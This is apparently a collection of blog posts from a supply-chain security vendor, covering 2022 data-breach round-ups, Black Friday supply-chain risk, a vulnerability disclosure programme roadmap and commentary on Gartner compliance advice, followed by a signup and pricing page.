Microsoft:

    • Another tech giant hit yet again. On October 19, 2022, Microsoft addressed the public after security researchers at SOCRadar informed Microsoft of a misconfigured Microsoft endpoint. After the discovery, Microsoft explained that the researchers exaggerated the entire situation. This misconfiguration resulted in the potential for unauthenticated access to some business transaction data corresponding to interactions between Microsoft and prospective customers. Information about planning or potential implementation and provisioning of Microsoft services was involved. In addition, the data that was potentially compromised includes names, email addresses, email content, company name, and phone numbers, and may have included attached files relating to business between a customer and Microsoft or an authorized Microsoft partner. 


Verizon:

    • In a notice, the company confirms, “we determined that between October 6 and October 10, 2022, a third party actor accessed the last four digits of the credit card used to make automatic payments on your account. Using the last four digits of that credit card, the third party was able to gain access to your Verizon account and may have processed an unauthorized SIM card change on the prepaid line that received the SMS linking to this notice.” 


Carousell:

    • On October 14, Carousell Singapore disclosed that it experienced a breach. And this wasn’t a small breach either – almost 2 million accounts were compromised. The company explains, “it is unlikely that this incident will result in an identity theft as it does not include information like your NRIC number,” but it is believed that emails were compromised. 


Medibank:

    • Bad news for Medibank, one of the largest Australian private health insurance providers. On October 12, 2022 the company discovered that customer information may have been compromised after a hack on their systems. It was thought that the original hack only affected certain customers, but after this week, the company is assuming that all 3.9 million customers were affected. The company said it had received a series of files from the alleged hacker, and they found the files included 100 ahm policy records, which include personal and health claims data, plus another 1,000 policy records from ahm, and files which contain some Medibank, ahm and international student customer data. The records provided to the company include names, addresses, dates of birth, Medicare numbers, phone numbers and medical claims data, including information about diagnosis, procedures and location of medical services.


Twilio:

    • Sometimes companies just can’t catch a break. Cloud communications company, Twilio, disclosed a new data breach stemming from a June 2022 security incident. After a lengthy investigation, the company concluded that 209 customers and 93 Authy end users had accounts that were impacted by the incident. 

 

Don’t let your company end up on this list. See how findings can help you here.

Supply Chain Risk Management: Your Black Friday Weakest Link

Supply Chain Risk Management: Your Black Friday Weakest Link

Black Friday is the time of year that is bound to put stress on many businesses’ supply chains. With demand soaring for items across the board, supply chains have already come under pressure from the effects of the past two years, and these delays are becoming more evident every day. So what does this mean for your risk management?

 

Unfortunately, not all risks originate internally. As you know, risks can also arise from within your supply chain. With increased strain (American consumers spent $8.9 billion online during Black Friday 2021), comes increased focus on your business’s reputation and possible fast tracking vetting of alternative vendors in your supply chain to keep up with demand. But thorough vetting should not be sidestepped. 

 

The Consequences Of Poor Supply Chain Risk Management On Black Friday Sales

 

Supply Chain Risk Management strategies that focus only on internal threats and ignore the supply chain fall short for 2 main reasons:

More threat opportunities

The threats that impact internal systems represent only a subset of all threats. But within your supply chain, attack vectors are far broader and numerous. You can’t always control the types of security exposures that your vendors or suppliers introduce to their products. And the last thing you want is this impacting your Black Friday sales. 


Lack of efficiency

If supply chain risk management isn’t part and parcel of your broader risk management strategy, it’s hard to manage supply chain risks efficiently. If you protect against supply chain threats at all, it ends up being through one-off audits or action against isolated threats.


At one of the busiest times of year, time and efficiency take center stage and It’s much more efficient to monitor for and address all types of risks – internal and external – through centralized tools and processes.

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

Major Holidays Leave The Door Open For Major Attacks

Retailers are particularly vulnerable to client-side attacks. Many online retail sites are built on CMS frameworks with a plethora of third-party plug-ins, from blog posting to popups to SEO maintenance. On average, 31 JavaScript resources are used per site, making retailers vulnerable to many forms of supply chain fraud such as formjacking, data-skimming and Magecart attacks.


Kaseya Attack Affecting the Supply Chain

Though initially thought to only affect 40 of its clients, it was further discovered that over 1,000 downstream companies were affected by this 4th July attack by Russian group, REvil. With over 40,000 organizations worldwide using at least one Kaseya software solution, the potential impact of this supply chain attack was massive. By exploiting zero day vulnerabilities in Kaseya’s software, it caused a major Swedish grocery store to completely shut for 24 hours as well as 11 schools in New Zealand. 


Magento Magecart Attack Prevented in 2021

With millions of transactions being carried out over the Black Friday period, it’s no surprise that this is a key target for threat actor’s to leverage vulnerabilities in the supply chain. In fact the UK’s National Cyber Security Centre (NCSC) notified small businesses about the risk of magecart attacks on and around Black Friday last year. They’re unique because they exploit third party scripts on companies’ websites. Because highly critical services, like Adobe’s Magento, are trusted and there are not many services like them, these attacks can impact 1000s of sites simultaneously. When the NCSC notified these businesses over 4000 were at risk.


A Better Approach To Supply Chain Risk Management And Intelligence

How do businesses avoid those shortcomings this Black Friday? How can they implement risk management that addresses both internal and external threats?

The answer is to deploy risk management processes and tools that provide the following features:

  • Continuous, real-time intelligence: Businesses need to know – immediately, before performance and security is affected – whenever a risk emerges within any internal or external asset.
  • Complete supply chain risk management: It’s crucial to identify risks that exist at any point in the supply chain. This includes risks introduced not just by third-party vendors with whom you do business directly, but also “fourth-party” vendors, meaning those who supply your direct vendors. Risks can arise from these vendors, too.
  • Automated, scalabile compliance: Checking for risks manually doesn’t scale (and takes away precious time, when time is a short commodity). Whether you have one vendor or one thousand, you need automation to ensure that you can detect all potential risks across all internal and external assets – and that nothing falls through the cracks.
  • Centralized compliance: Risk management is inherently fragmented because risks come in many forms and affect many types of systems. Nonetheless, businesses should be able to manage all risks comprehensively using a platform that works across the enterprise. When you centralize risk management, you save time and maximize risk coverage.


The Findings Difference

With Findings, you are provided with an automated, comprehensive supply chain risk management solution that empowers businesses to manage supply chain risks proactively by getting ahead of issues before they happen. Instead of treating the supply chain as a black box from the perspective of compliance, leverage Findings to implement centralized, enterprise-wide supply chain risk management for both internal and external threats. 

Don’t get caught out this Black Friday (or any day!). Get started at Findings.co.

September Security Breach Round Up

September Security Breach Round Up. An iPhone with a broken lock - signifying a breach.

Cybersecurity threats have become an integrated part of every company’s lifecycle. They are occurring now more than ever, and hackers are not selective – ultimately putting any company at risk for an attack. 

 

To keep your company safe and your cybersecurity team up to date with the latest trends, it’s important to learn from recent incidents to avoid the same mistakes that left even the world’s largest corporations exposed. 

 

Here are our top 5 September 2022 read-worthy incidents:

 

Uber:

Sneaking out of the house isn’t the only thing teens are getting good at and a recent breach proves this. On September 15, 2022, Uber fell victim to an attack. In this case, a suspected teen hacker, who Uber believes is a part of Lapsus$, was able to access Uber’s systems. In a company notice, Uber explains that the hacker likely purchased an Uber EXT contractor’s password off the dark web, and after many attempts, was successfully able to access this worker’s account. Several internal systems, internal slack messages, information from an internal tool the company uses to manage invoices, and their dashboard at HackerOne were all accessed. 


Samsung:

Most would think that one of the world’s biggest tech companies is heavily secure, right? Well… On September 2, 2022, Samsung confirmed a cybersecurity incident that affected customer data. Information such as name, contact and demographic information, date of birth, and product registration information may have been compromised. After further investigation, Samsung discovered that this incident stemmed from an unauthorized third party acquiring information from some of Samsung’s U.S. systems. 


Optus:

Optus, one of Australia’s largest telecommunication companies, suffered a cyberattack and confirmed it on September 22, 2022, through a company announcement. Customer names, dates of birth, phone numbers, email addresses, street addresses, medicare cards, and ID document numbers such as driver’s license and passport numbers of over 9 million people were potentially exposed.


American Airlines (Again?! Really?!):

On September 16, 2022, American Airlines informed customers that they experienced a security incident in July 2022. The notice explains the discovery of an unauthorized actor who compromised the email accounts of a limited number of American Airlines employees. Upon further investigation, they found that personal information such as name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information were accessible through  the email accounts. 


Tap Air Portugal:

As aviation becomes a hot target, TAP Air Portugal released an important notice to customers on September 21, 2022, regarding a cyber attack discovered back in August. The notice reads, “Regretfully, we want to inform that the following categories of personal data from some customers of TAP have been disclosed: name, nationality, gender, date of birth, address, email, telephone contact, customer registration date and frequent flyer number. The information for each affected customer may vary. We are releasing this notice to make customers aware of this matter. There is no indication that payment data was exfiltrated from TAP’s network.” While the company did not disclose how many people were affected, it is believed that over 1.5 million TAP customers had their data stolen. 


While we’ve only listed 5 of the many incidents that occurred in September, it’s important to mention that breaches occur all the time, and hackers are getting more and more creative and sophisticated. 


As businesses, it’s even more important for you to find ways to prevent, detect, and respond to these attacks in a quick and effective manner. 


Keeping your supply chain secure is vital to keeping it functioning properly and that’s why we’ve put together a supply chain security enhancement checklist for companies to reference. 

 

 

                                                                      At Findings, we help secure your digital supply chain. Discover how we can benefit your business here.

A CISO’s VDP Security Roadmap, Step-by-Step

Findings-VDP Roadmap

When it comes to cybersecurity, discovering vulnerabilities is often the easy part. What tends to be challenging is figuring out where to disclose vulnerabilities once you’ve discovered them.

If someone inside your business or supply chain discovers a vulnerability but fails to report it to the people who need to know about it, the vulnerability may as well not have been discovered at all. It’s only by disclosing and reporting vulnerabilities that stakeholders can remediate them, while also taking steps to avoid falling victim to them until their root cause is addressed.

That’s why establishing vulnerability disclosure programs and policies is critical to cybersecurity success – not to mention the overall health of your business. Setting up a VDP places you ahead of competitors who lack one. It also sends a clear message to vendors, customers, partners, employees and other stakeholders that you take cybersecurity seriously and operate with transparency when you discover vulnerabilities. And it establishes clear policies, robust communication channels and backend processes that help you resolve vulnerabilities and risks quickly.

 

 

But how do you actually create a security VDP initiative? What goes into a VDP, and how do you ensure your VDP application covers all security requirements? Keep reading for answers to those questions as we walk through the five major components of a VDP “roadmap” that can support teams and project managers when it comes to disclosing and reporting on vulnerabilities and ensuring they get back to the Cybersecurity Infrastructure and Security Agency (CISA). CISA which plays a leading role in managing vulnerabilities (and which has also, incidentally, developed a new VDP platform because it recognizes how crucial – and challenging – effective VDP security can be).

 

VDP security step 1: Outline your goals

Creating a VDP to reinforce your security strategy starts with determining exactly what you hope to get out of your VDP.

Ask questions such as:

  • What is the driving factor for your VDP? Having a clear VDP program is essential if you want to work with US officials. Do you want to promote increased security, improve coordination between teams, increase vulnerability visibility or something else? While VDP security operations can do all of these things, you may choose to prioritize one of them in particular.
  • What are your main VDP pain points? What’s currently getting in the way of vulnerability disclosure? Is it a lack of employee education or lack of communication channels, for instance?
  • What role does your VDP play in your overall business? VDPs don’t just serve security purposes. They can also help you achieve business goals by developing a unique selling proposition..

Once you know your main VDP security goals, you can build and use a VDP application tailored to them.

 

VDP security step 2: Assign responsibilities, develop policies

To start building your program, you need to map responsibilities to stakeholders, then establish policies that define who does what within the context of vulnerability disclosure. CISA offers a template that may be helpful for this purpose.

Identify, for starters, who needs to be aware of the program and who needs to participate in it. Then go deeper by defining specific responsibilities for collecting, analyzing and reporting on vulnerabilities.

Outline as well which security policies your vendors need to adhere to, and how you’ll keep those policies up-to-date. And determine whether vulnerability disclosers will be allowed to remain anonymous. An anonymous disclosure does not make the disclosure any less important. A researcher may simply not want their name on any of the disclosure notes.

Ultimately, your goal during this step should be to lay the groundwork for a community that helps itself with vulnerability disclosure and management. 

 

VDP security step 3: Integrate VDP into your processes

Vulnerability disclosure processes shouldn’t exist in a silo. Instead, they should be integrated into your routine business operations, and your VDP policies map should reflect this.

For example, your VDP should outline how software development, testing and deployment operations interface with VDP reporting requirements. It should also define exactly which tests should be run in an effort to discover vulnerabilities.

By establishing these processes, you not only gain efficiency when it comes to managing vulnerabilities. You also set clear guidelines that employees, researchers and vendors should follow to ensure that all vulnerabilities are discovered and disclosed effectively. You should give CISOs and researchers enough scope so that they can provide valuable feedback, but not so much scope that your team can’t keep up with the incoming reports. 

These policies may also help to drive VDP automation by making it possible to automate VDP discovery and reporting within the context of routine business operations. Education is key across the organization and a security culture needs to be embedded into the fabric of your business. 

 

VDP security step 4: Evaluate vendors

Once you’ve determined which VDP policies your business needs to meet, it’s time to evaluate your vendors and perform due diligence to confirm that they align with your requirements.

Rank your vendors according to their overall security postures. You can sort them into three categories: High security, medium security or low security.

From there, choose which vendors require more monitoring, and which pose such security risks that you can’t work with them. You should also highlight vendors with excellent security records, since you may want to target them for long-term partnerships.

To validate your vendor assessments, collect documentation, including the frameworks and security rules that the vendors adhere to internally. Keep these documents secure and update them periodically because they may change.

 

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

VDP security step 5: Continuously monitor and audit VDP compliance

After rolling out your VDP policies and vetting vendors, you need to monitor, measure and audit continuously to ensure that stakeholders continue to follow the guidelines. Your goal here is to ensure that everyone – including internal users like your employees, as well as vendors and other external parties – remain in compliance with VDP policies you establish.

To make this process efficient, you’ll want to automate it as much as possible. Automation also ensures that you can scale your business as VDP requirements grow continuously more complex, and as you integrate more vendors and other stakeholders into your operations.

 

With VDP, everyone wins (except the bad folks)

Establishing clear, transparent and actionable VDP rules is a win-win for everyone (except, of course, the threat actors who want to exploit vulnerabilities). It lays the foundation for effective collaboration while also strengthening relationships with both internal and external stakeholders. And it facilitates the fast resolution of vulnerabilities and breaches by getting vulnerability data to organizations like CISA as rapidly as possible.

Findings bakes VDP into  their platform, making VDP security an effortless operation. With Findings, you can both discover and report on vulnerabilities across your business’s supply chain. Findings bakes the “switch” for vulnerability disclosure directly into your business operations, making your VDP processes efficient, scalable and all-encompassing.

 

Learn more by signing up for a Findings demo.

Our Take on Gartner’s Latest Supply Chain Compliance Advice

our take on supply chain compliance

Going forward, businesses need a new strategy for vetting and monitoring the compliance of their suppliers. But don’t just take our word for it. These are among the takeaways from Gartner’s latest guidance on supply chain compliance and management

 

Gartner highlights why conventional supplier onboarding methods no longer work as businesses need to onboard suppliers quickly, while also ensuring that suppliers meet their compliance requirements.

 

The global supply chain compliance crisis

You probably already know that supply chains are under stress, to put mildly. Gartner points to a couple of main reasons why:

 

  • Businesses are increasingly working with suppliers from new geographic regions, where compliance norms may be different. This complicates onboarding and requires a deeper level of compliance inspection.
  • Organizations often need to add vendors quickly in order to keep their supply chains moving. Yet, without a fast onboarding process, integrating suppliers is time-consuming, which increases the stress placed on supply chains.
  • We’d also add, that issues like global sanctions, which have become especially pronounced as a result of the ongoing Ukraine-Russia war, add even more complexity to vendor onboarding. 

 

We agree wholeheartedly that these are among the key reasons why supply chain compliance and management have become so challenging for the typical business today.

Today, you have to worry not only about whether your vendors meet standard compliance rules, but also about potential sanctions that are subject to constant change. This adds yet more unpredictability and complexity to the onboarding process.

Add to that the surge in supply chain cyber security risks, and it’s no exaggeration to say that operating efficient, compliant supply chains has never been tougher than it is at present.

 

How to streamline supply chain compliance

Gartner suggests three main strategies for addressing the supply chain compliance challenges that businesses currently face.

 

1. Create a playbook for vetting vendors

First, Gartner recommends creating a “playbook that grades each third party’s threat level to determine who gets more attention from the business and compliance.”

 

The idea here is that you can develop preset policies to analyze vendors rapidly during and after the onboarding process. Your policies should reflect information like which risks have impacted your business in the past and how closely a given vendor matches the risk profile of other vendors who have posed challenges.

 

We love this idea not only because it helps businesses to be proactive in their approach to vendor compliance, but also because it lays the groundwork for compliance automation. Playbooks make it possible to implement vendor compliance validation automatically within a security platform, which could sort vendors into high-risk, medium-risk and low-risk categories

This may be of interest to you:

 A CISO’s VDP security roadmap based on criteria defined in the playbooks

2. Automate supply chain compliance

The piece quotes Chris Audet, Senior Director of Research at Gartner, who says, “Compliance leaders must move quickly to onboard third parties and effectively monitor for risks, but many of their traditional methods won’t cut it.”

 

The way to move quickly and monitor for risks comprehensively is to automate risk detection. Automation can help you collect the information you need to make good decisions about vendor risks. It can also automatically flag risks with the help of advanced analytics, and it can help you keep up-to-date as vendor profiles change. In all of these ways, automation helps businesses to complete vendor onboarding quickly, even if they have an increasing number of vendors to vet and face increasing complexity due to new compliance mandates, new sanctions rules or diverse vendor geographies.

 

3. Streamline upfront due diligence

As another way to speed up onboarding, Gartner advises businesses to “streamline due diligence to focus on critical risks.” It suggests doing this by reducing the number of questions you ask vendors to answer manually. Focus validation around critical risk areas, Gartner suggests, rather than asking a large number of questions that may not be relevant for every vendor.

 

We agree. We’d add, though, that it’s important to leverage automation wherever possible to collect as much data as you can about supplier insurance, safety, environment and sustainability initiatives, legal and financial data and any other information that can be helpful for gaining a 360-degree view of your suppliers and sub-suppliers. With automation, it’s possible to onboard rapidly without compromising on your visibility into supply chain compliance.

 

Bonus advice: Establish a compliance-focused company culture

We think Gartner did a great job of capturing much of what it takes to achieve supply chain compliance. But we’d suggest another strategy that Gartner hasn’t mentioned: Building a compliance-centric culture.

 

A compliance-centric culture is one that maximizes collaboration and communication related to compliance. It aligns compliance with vendor expectations, and it allows all stakeholders – both internal and external ones – to share information rapidly in order to manage compliance and supply chain cyber security risks.


Findings helps you to build this culture by providing a platform that anyone can use to raise compliance flags automatically. With Findings, you get holistic compliance that protects your entire supply chain, while also benefiting from automations that allow you to onboard vendors rapidly.

 

Learn more about how Findings can help you to streamline your compliance.

 

Supply Chain Risk Monitoring as a Service
Join us today
Supply Chain Risk Monitoring as a Service
Join us today
Waitlist signup

Welcome to Findings

Let's go over some details to setup your tailor-made account


Please fill your details below and click "Next" to create your account:

Payment

Feature
Startup
Business
Enterprise
Price
$10 / Month
$10 / Month
$25 / Month
VDPaaS
Alerts
Assessments
Integrated Apps
API
Join today and scan ALL YOUR VENDORS for FREE*
* FREE VENDOR SCAN for all of your vendors during your first month.
Feature
Startup
Business
Enterprise
Price
$25 / Month
$200 / Month*
Contact Us
Free vendors scan for 1 month
Findings search engine
Rapid security and compliance profile
Profile/showcase engagements per year
5
40
Unlimited
Multi/unlimited showcase use cases
Showcase compliance badge for your website
Best practice self-assessment
1 Findings or 1 BYOC
Assessment response automation
Personalizable, branded security & compliance showcase page
File/evidence repository
OKTA
DKIM
Out-of-the-box TPRM
20 vendors +
20 rating scans
50 vendors +
50 rating scans
Support
Email
Priority via Phone / Email
Internal Workflows (SO/BO)
Onboarding and customization account setup
*Price for every 40 engagements
Automate assessment response and showcase your cybersecurity posture
Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!

Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!